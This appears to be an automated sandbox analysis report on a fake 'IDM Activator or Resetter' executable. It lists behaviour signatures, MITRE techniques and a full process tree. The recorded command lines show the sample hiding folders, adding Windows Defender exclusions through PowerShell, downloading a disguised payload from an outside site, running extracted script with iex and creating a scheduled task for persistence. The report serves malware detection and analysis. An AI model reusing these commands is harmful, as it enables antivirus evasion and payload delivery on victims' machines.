7822fa6c35cbd1cfb95c780970deef14d8b53c62ade3a4bcf63c494c3f2e5bbd

Analysis

max time kernel
94s
max time network
94s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
21-10-2024 08:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IDM 6.xx Activator or Resetter v3.3.exe
Size

522KB
MD5

b2bb695b656dfb91e01967de3a8beee3
SHA1

30ebac4eb84aa036bed8f8931b6493348b87108a
SHA256

7822fa6c35cbd1cfb95c780970deef14d8b53c62ade3a4bcf63c494c3f2e5bbd
SHA512

4c052ae34c2063b2d2ec8a9a877eaa4c20906d979d94305430bb00a3e7991ec7349b7a3965a0479dd48a1763bdb66e449a5be4c8d9c59abcaa3f180fedf8d269
SSDEEP

12288:Mk5L2FqPzzhB4kLSQ4ybubjWlj+o2sjdg:M2yQPvnlS7ybubjKj+NsRg

Score

8^/10

discovery evasion execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

2 1488 powershell.exe

flow	pid	process
2	1488	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1624	powershell.exe
1460	powershell.exe
4236	powershell.exe
4244	powershell.exe
4216	powershell.exe
1820	powershell.exe
5016	powershell.exe
1488	powershell.exe

Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

3236 attrib.exe
1496 attrib.exe
Executes dropped EXE 7 IoCs

Processes:

7za.exe7za.exe7za.exe7za.exe7za.exe7za.exeNSudo86x.exe

pid process

2788 7za.exe
3332 7za.exe
3820 7za.exe
3496 7za.exe
1428 7za.exe
332 7za.exe
4676 NSudo86x.exe
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exe

pid process

2144 sc.exe
2812 sc.exe
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
3236	attrib.exe
1496	attrib.exe

pid	process
2788	7za.exe
3332	7za.exe
3820	7za.exe
3496	7za.exe
1428	7za.exe
332	7za.exe
4676	NSudo86x.exe

pid	process
2144	sc.exe
2812	sc.exe

System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exepowershell.exeschtasks.exeIDM 6.xx Activator or Resetter v3.3.exeattrib.exe7za.exefind.exereg.execmd.exeattrib.exepowershell.execmd.exe7za.exe7za.execmd.exepowershell.exepowershell.exe7za.exe7za.exe7za.exeNSudo86x.exefind.exereg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IDM 6.xx Activator or Resetter v3.3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7za.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7za.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7za.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7za.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7za.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7za.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NSudo86x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Checks processor information in registry 2 TTPs 11 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

reg.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	reg.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	reg.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 3 IoCs

Processes:

reg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\WOW6432Node\CLSID\IAS_TEST\	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\WOW6432Node\CLSID\IAS_TEST	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Wow6432Node\CLSID\IAS_TEST	reg.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exe

pid process

2192 reg.exe
2548 reg.exe
1484 reg.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

872 schtasks.exe

pid	process
2192	reg.exe
2548	reg.exe
1484	reg.exe

pid	process
872	schtasks.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeNSudo86x.exemsedge.exemsedge.exemsedge.exeidentity_helper.exe

pid	process
1624	powershell.exe
4216	powershell.exe
1624	powershell.exe
4216	powershell.exe
1820	powershell.exe
1820	powershell.exe
5016	powershell.exe
5016	powershell.exe
2064	powershell.exe
2064	powershell.exe
4832	powershell.exe
4832	powershell.exe
4880	powershell.exe
4880	powershell.exe
1460	powershell.exe
1460	powershell.exe
4880	powershell.exe
4880	powershell.exe
4880	powershell.exe
4880	powershell.exe
4236	powershell.exe
4236	powershell.exe
4244	powershell.exe
4244	powershell.exe
1488	powershell.exe
1488	powershell.exe
3472	powershell.exe
3472	powershell.exe
4676	NSudo86x.exe
4676	NSudo86x.exe
2548	msedge.exe
2548	msedge.exe
2292	msedge.exe
2292	msedge.exe
2844	msedge.exe
2844	msedge.exe
3472	identity_helper.exe
3472	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

2292 msedge.exe
2292 msedge.exe
2292 msedge.exe
2292 msedge.exe
2292 msedge.exe
2292 msedge.exe
2292 msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7za.exe7za.exe7za.exe7za.exe7za.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe7za.exepowershell.exeNSudo86x.exe

description	pid	process
Token: SeRestorePrivilege	2788	7za.exe
Token: 35	2788	7za.exe
Token: SeSecurityPrivilege	2788	7za.exe
Token: SeSecurityPrivilege	2788	7za.exe
Token: SeRestorePrivilege	3332	7za.exe
Token: 35	3332	7za.exe
Token: SeSecurityPrivilege	3332	7za.exe
Token: SeSecurityPrivilege	3332	7za.exe
Token: SeRestorePrivilege	3820	7za.exe
Token: 35	3820	7za.exe
Token: SeSecurityPrivilege	3820	7za.exe
Token: SeSecurityPrivilege	3820	7za.exe
Token: SeRestorePrivilege	3496	7za.exe
Token: 35	3496	7za.exe
Token: SeSecurityPrivilege	3496	7za.exe
Token: SeSecurityPrivilege	3496	7za.exe
Token: SeRestorePrivilege	1428	7za.exe
Token: 35	1428	7za.exe
Token: SeSecurityPrivilege	1428	7za.exe
Token: SeSecurityPrivilege	1428	7za.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeDebugPrivilege	4216	powershell.exe
Token: SeDebugPrivilege	1820	powershell.exe
Token: SeDebugPrivilege	5016	powershell.exe
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	4832	powershell.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	4236	powershell.exe
Token: SeDebugPrivilege	4244	powershell.exe
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeRestorePrivilege	332	7za.exe
Token: 35	332	7za.exe
Token: SeSecurityPrivilege	332	7za.exe
Token: SeSecurityPrivilege	332	7za.exe
Token: SeDebugPrivilege	3472	powershell.exe
Token: 22792824504188948	4676	NSudo86x.exe
Token: SeAssignPrimaryTokenPrivilege	4676	NSudo86x.exe
Token: SeIncreaseQuotaPrivilege	4676	NSudo86x.exe
Token: SeTcbPrivilege	4676	NSudo86x.exe
Token: SeSecurityPrivilege	4676	NSudo86x.exe
Token: SeTakeOwnershipPrivilege	4676	NSudo86x.exe
Token: SeLoadDriverPrivilege	4676	NSudo86x.exe
Token: SeProfSingleProcessPrivilege	4676	NSudo86x.exe
Token: SeIncBasePriorityPrivilege	4676	NSudo86x.exe
Token: SeCreatePermanentPrivilege	4676	NSudo86x.exe
Token: SeBackupPrivilege	4676	NSudo86x.exe
Token: SeRestorePrivilege	4676	NSudo86x.exe
Token: SeShutdownPrivilege	4676	NSudo86x.exe
Token: SeDebugPrivilege	4676	NSudo86x.exe
Token: SeAuditPrivilege	4676	NSudo86x.exe
Token: SeSystemEnvironmentPrivilege	4676	NSudo86x.exe
Token: SeChangeNotifyPrivilege	4676	NSudo86x.exe
Token: SeUndockPrivilege	4676	NSudo86x.exe
Token: SeManageVolumePrivilege	4676	NSudo86x.exe
Token: SeImpersonatePrivilege	4676	NSudo86x.exe
Token: SeCreateGlobalPrivilege	4676	NSudo86x.exe
Token: 31	4676	NSudo86x.exe
Token: SeIncreaseQuotaPrivilege	4676	NSudo86x.exe
Token: SeSecurityPrivilege	4676	NSudo86x.exe
Token: SeTakeOwnershipPrivilege	4676	NSudo86x.exe
Token: SeLoadDriverPrivilege	4676	NSudo86x.exe
Token: SeSystemProfilePrivilege	4676	NSudo86x.exe
Token: SeSystemtimePrivilege	4676	NSudo86x.exe

Suspicious use of FindShellTrayWindow 25 IoCs

Processes:

msedge.exe

pid	process
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid	process
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

conhost.exe

pid process

4092 conhost.exe

pid	process
4092	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

IDM 6.xx Activator or Resetter v3.3.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4644 wrote to memory of 2128	4644	IDM 6.xx Activator or Resetter v3.3.exe	cmd.exe
PID 4644 wrote to memory of 2128	4644	IDM 6.xx Activator or Resetter v3.3.exe	cmd.exe
PID 4644 wrote to memory of 2128	4644	IDM 6.xx Activator or Resetter v3.3.exe	cmd.exe
PID 2128 wrote to memory of 3236	2128	cmd.exe	attrib.exe
PID 2128 wrote to memory of 3236	2128	cmd.exe	attrib.exe
PID 2128 wrote to memory of 3236	2128	cmd.exe	attrib.exe
PID 2128 wrote to memory of 2788	2128	cmd.exe	7za.exe
PID 2128 wrote to memory of 2788	2128	cmd.exe	7za.exe
PID 2128 wrote to memory of 2788	2128	cmd.exe	7za.exe
PID 2128 wrote to memory of 3332	2128	cmd.exe	7za.exe
PID 2128 wrote to memory of 3332	2128	cmd.exe	7za.exe
PID 2128 wrote to memory of 3332	2128	cmd.exe	7za.exe
PID 2128 wrote to memory of 3820	2128	cmd.exe	7za.exe
PID 2128 wrote to memory of 3820	2128	cmd.exe	7za.exe
PID 2128 wrote to memory of 3820	2128	cmd.exe	7za.exe
PID 2128 wrote to memory of 3496	2128	cmd.exe	7za.exe
PID 2128 wrote to memory of 3496	2128	cmd.exe	7za.exe
PID 2128 wrote to memory of 3496	2128	cmd.exe	7za.exe
PID 2128 wrote to memory of 1428	2128	cmd.exe	7za.exe
PID 2128 wrote to memory of 1428	2128	cmd.exe	7za.exe
PID 2128 wrote to memory of 1428	2128	cmd.exe	7za.exe
PID 4644 wrote to memory of 3280	4644	IDM 6.xx Activator or Resetter v3.3.exe	cmd.exe
PID 4644 wrote to memory of 3280	4644	IDM 6.xx Activator or Resetter v3.3.exe	cmd.exe
PID 4644 wrote to memory of 3280	4644	IDM 6.xx Activator or Resetter v3.3.exe	cmd.exe
PID 4644 wrote to memory of 3816	4644	IDM 6.xx Activator or Resetter v3.3.exe	cmd.exe
PID 4644 wrote to memory of 3816	4644	IDM 6.xx Activator or Resetter v3.3.exe	cmd.exe
PID 4644 wrote to memory of 3816	4644	IDM 6.xx Activator or Resetter v3.3.exe	cmd.exe
PID 3280 wrote to memory of 1760	3280	cmd.exe	reg.exe
PID 3280 wrote to memory of 1760	3280	cmd.exe	reg.exe
PID 3280 wrote to memory of 1760	3280	cmd.exe	reg.exe
PID 3280 wrote to memory of 4472	3280	cmd.exe	find.exe
PID 3280 wrote to memory of 4472	3280	cmd.exe	find.exe
PID 3280 wrote to memory of 4472	3280	cmd.exe	find.exe
PID 3280 wrote to memory of 4676	3280	cmd.exe	reg.exe
PID 3280 wrote to memory of 4676	3280	cmd.exe	reg.exe
PID 3280 wrote to memory of 4676	3280	cmd.exe	reg.exe
PID 3280 wrote to memory of 1132	3280	cmd.exe	find.exe
PID 3280 wrote to memory of 1132	3280	cmd.exe	find.exe
PID 3280 wrote to memory of 1132	3280	cmd.exe	find.exe
PID 3280 wrote to memory of 1496	3280	cmd.exe	attrib.exe
PID 3280 wrote to memory of 1496	3280	cmd.exe	attrib.exe
PID 3280 wrote to memory of 1496	3280	cmd.exe	attrib.exe
PID 3816 wrote to memory of 756	3816	cmd.exe	cmd.exe
PID 3816 wrote to memory of 756	3816	cmd.exe	cmd.exe
PID 3280 wrote to memory of 1624	3280	cmd.exe	powershell.exe
PID 3280 wrote to memory of 1624	3280	cmd.exe	powershell.exe
PID 3280 wrote to memory of 1624	3280	cmd.exe	powershell.exe
PID 756 wrote to memory of 2144	756	cmd.exe	sc.exe
PID 756 wrote to memory of 2144	756	cmd.exe	sc.exe
PID 756 wrote to memory of 1964	756	cmd.exe	find.exe
PID 756 wrote to memory of 1964	756	cmd.exe	find.exe
PID 756 wrote to memory of 2600	756	cmd.exe	findstr.exe
PID 756 wrote to memory of 2600	756	cmd.exe	findstr.exe
PID 756 wrote to memory of 3672	756	cmd.exe	cmd.exe
PID 756 wrote to memory of 3672	756	cmd.exe	cmd.exe
PID 756 wrote to memory of 2192	756	cmd.exe	reg.exe
PID 756 wrote to memory of 2192	756	cmd.exe	reg.exe
PID 756 wrote to memory of 4604	756	cmd.exe	find.exe
PID 756 wrote to memory of 4604	756	cmd.exe	find.exe
PID 756 wrote to memory of 1484	756	cmd.exe	cmd.exe
PID 756 wrote to memory of 1484	756	cmd.exe	cmd.exe
PID 1484 wrote to memory of 3996	1484	cmd.exe	cmd.exe
PID 1484 wrote to memory of 3996	1484	cmd.exe	cmd.exe
PID 1484 wrote to memory of 3708	1484	cmd.exe	cmd.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

1496 attrib.exe
3236 attrib.exe

pid	process
1496	attrib.exe
3236	attrib.exe

C:\Users\Admin\AppData\Local\Temp\IDM 6.xx Activator or Resetter v3.3.exe
"C:\Users\Admin\AppData\Local\Temp\IDM 6.xx Activator or Resetter v3.3.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4644
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\main.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2128
- - C:\Windows\SysWOW64\attrib.exe
    ATTRIB -S +H .
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:3236
- - C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
    7za e files.tmp -ptmp@tmp420 -aoa IDM0.bat
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2788
- - C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
    7za e files.tmp -ptmp@tmp420 -aoa IDM.bat
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3332
- - C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
    7za e files.tmp -ptmp@tmp420 -aoa NSudo86x.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3820
- - C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
    7za e files.tmp -ptmp@tmp420 -aoa AB2EF.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3496
- - C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
    7za e files.tmp -ptmp@tmp420 -aoa UpdateTask.xml
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM0.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3280
- - C:\Windows\SysWOW64\reg.exe
    REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1760
- - C:\Windows\SysWOW64\find.exe
    FIND /I "1"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4472
- - C:\Windows\SysWOW64\reg.exe
    REG QUERY "HKLM\Hardware\Description\System\CentralProcessor\0"
    3⤵
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:4676
- - C:\Windows\SysWOW64\find.exe
    FIND /I "x86"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1132
- - C:\Windows\SysWOW64\attrib.exe
    ATTRIB +S +H "C:\Users\Admin\AppData\Roaming\DLL"
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1496
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POWERSHELL -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DLL" -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1624
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POWERSHELL -Command Add-MpPreference -ExclusionProcess "dlIhost.exe" -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1460
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POWERSHELL -Command Add-MpPreference -ExclusionProcess "NSudo86x.exe" -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4236
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POWERSHELL -Command Add-MpPreference -ExclusionProcess "7za.exe" -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4244
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POWERSHELL -Command "Invoke-WebRequest 'https://www.crackingcity.com/VScan/dlIhost.7z' -OutFile 'C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1488
- - C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
    7za e "C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z" -o"C:\Users\Admin\AppData\Roaming\DLL" -pun#912345678@rar -aoa
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:332
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /xml ".\UpdateTask.xml" /tn "UpdateTask" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3816
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat" r1"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:756
  - - C:\Windows\System32\sc.exe
      sc query Null
      4⤵
      Launches sc.exe
      PID:2144
  - - C:\Windows\System32\find.exe
      find /i "RUNNING"
      4⤵
      PID:1964
  - - C:\Windows\System32\findstr.exe
      findstr /v "$" "IDM.bat"
      4⤵
      PID:2600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ver
      4⤵
      PID:3672
  - - C:\Windows\System32\reg.exe
      reg query "HKCU\Console" /v ForceV2
      4⤵
      PID:2192
  - - C:\Windows\System32\find.exe
      find /i "0x0"
      4⤵
      PID:4604
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c echo prompt $E | cmd
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1484
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo prompt $E "
        5⤵
        
        PID:3996
    - - C:\Windows\System32\cmd.exe
        
        cmd
        5⤵
        
        PID:3708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':PowerShellTest:\s*';iex ($f[1])"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4216
  - - C:\Windows\System32\find.exe
      find /i "FullLanguage"
      4⤵
      PID:2960
  - - C:\Windows\System32\fltMC.exe
      fltmc
      4⤵
      PID:1576
  - - C:\Windows\System32\conhost.exe
      conhost.exe powershell.exe "$t=[AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); $t.DefinePInvokeMethod('GetStdHandle', 'kernel32.dll', 22, 1, [IntPtr], @([Int32]), 1, 3).SetImplementationFlags(128); $t.DefinePInvokeMethod('SetConsoleMode', 'kernel32.dll', 22, 1, [Boolean], @([IntPtr], [Int32]), 1, 3).SetImplementationFlags(128); $k=$t.CreateType(); $b=$k::SetConsoleMode($k::GetStdHandle(-10), 0x0080); & cmd.exe '/c' '"""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat""" -el r1 -qedit'"
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:4092
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$t=[AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); $t.DefinePInvokeMethod('GetStdHandle', 'kernel32.dll', 22, 1, [IntPtr], @([Int32]), 1, 3).SetImplementationFlags(128); $t.DefinePInvokeMethod('SetConsoleMode', 'kernel32.dll', 22, 1, [Boolean], @([IntPtr], [Int32]), 1, 3).SetImplementationFlags(128); $k=$t.CreateType(); $b=$k::SetConsoleMode($k::GetStdHandle(-10), 0x0080); & cmd.exe '/c' '\"C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat\" -el r1 -qedit'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1820
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat" -el r1 -qedit"
        6⤵
        
        PID:736
        
        C:\Windows\System32\sc.exe
        
        sc query Null
        7⤵
        Launches sc.exe
        
        PID:2812
        
        C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        7⤵
        
        PID:2248
        
        C:\Windows\System32\findstr.exe
        
        findstr /v "$" "IDM.bat"
        7⤵
        
        PID:3640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        7⤵
        
        PID:1900
        
        C:\Windows\System32\reg.exe
        
        reg query "HKCU\Console" /v ForceV2
        7⤵
        
        PID:880
        
        C:\Windows\System32\find.exe
        
        find /i "0x0"
        7⤵
        
        PID:1036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c echo prompt $E | cmd
        7⤵
        
        PID:3560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo prompt $E "
        8⤵
        
        PID:2708
        
        C:\Windows\System32\cmd.exe
        
        cmd
        8⤵
        
        PID:1212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':PowerShellTest:\s*';iex ($f[1])"
        7⤵
        Command and Scripting Interpreter: PowerShell
